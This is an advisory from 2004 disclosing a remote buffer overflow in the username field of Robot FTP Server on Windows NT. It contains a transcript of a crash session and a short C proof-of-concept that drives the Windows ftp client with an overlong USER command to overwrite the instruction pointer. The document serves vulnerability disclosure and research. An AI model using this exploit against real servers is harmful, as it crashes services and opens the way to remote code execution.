Application:  Robot FTP Server

              http://www.robotftp.com/

Versions:     1.0/2.0 beta 1 

Platforms:    Windows NT

Bug:          Buffer Overflow

Exploitation: remote

Date:         15 Feb 2004

Author:       gsicht

              e-mail: nothing.king@firemail.de



#######################################################################

1) Introduction

2) Bug

3) The Code

#######################################################################

===============

1) Introduction

===============

Quoute from the Robot ftp's website:

"RobotFTP server is an FTP server that will transform any windows computer into an FTP site and enable distribution of files to co-workers or friends.



Robotftp Server is extremely easy to setup and configure. You can create password protected or anonymous accounts, specify folders and files that are accessible for each account, and monitor activities of connected users."



#######################################################################

======

2) Bug

======

I found a buffer overflow vulnerability in Robotftp server in the username fiehlt that allowes remote command execution. I only found this vulnerability with the windows ftp client. It doesn't work with netcat or telnet.



C:\Dokumente und Einstellungen\Admin\Desktop>ftp localhost



220 Connected to RobotFTP Server

Benutzer (done:(none)): <AA...more than 47 A's...AA>  

331 User name OK, send password as PASS

Kennwort:

530 User cannot log in

Anmeldung fehlgeschlagen.

ftp> Ungültiger Befehl

ftp> user <AA... about 2000 A's ...AA>

550 Access is denied

550 Access is denied

550 Access is denied

550 Access is denied

550 Access is denied

550 Access is denied

550 Access is denied

502 Command not implemented

Anmeldung fehlgeschlagen.

ftp> Ungültiger Befehl

CRASH!!!!!!

ftp> quit

C:\Dokumente und Einstellungen\Admin\Desktop>



#######################################################################

===========

3) The Code

===========

/******************************

this is example code for the vulnerability. It uses the windows ftp client to connect to a server

******************************/

#include <stdio.h>



char buffer[2500]; 

char cmd[50];



int main(int argc, char *argv[])

{

	FILE *evil;



	if(argv[1] == NULL)

	{

		printf("Usage: %s [IP]\n\n",argv[0]);

		return 0;

	}



	memset(buffer,0x41,47);

	memcpy(buffer+47,"\r\n",2);

	memcpy(buffer+49,"crash",5);

	memcpy(buffer+54,"\r\n",2);

	memcpy(buffer+56,"USER ",5);

	memset(buffer+61,0x41,1989);

	memset(buffer+61+1989,0x58,4);	// << overwrites the eip with XXXX

	memcpy(buffer+65+1989,"\r\n",2);



	sprintf(cmd,"ftp -s:ftp.txt %s",argv[1]);





	if((evil = fopen("ftp.txt", "a+")) != NULL)

	{

		fputs(buffer, evil);

		fclose(evil);

		printf("- file written!\n");

	}

	else

	{

		fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");

		exit(1);

	}

	system(cmd);



}

/*******************************/

#######################################################################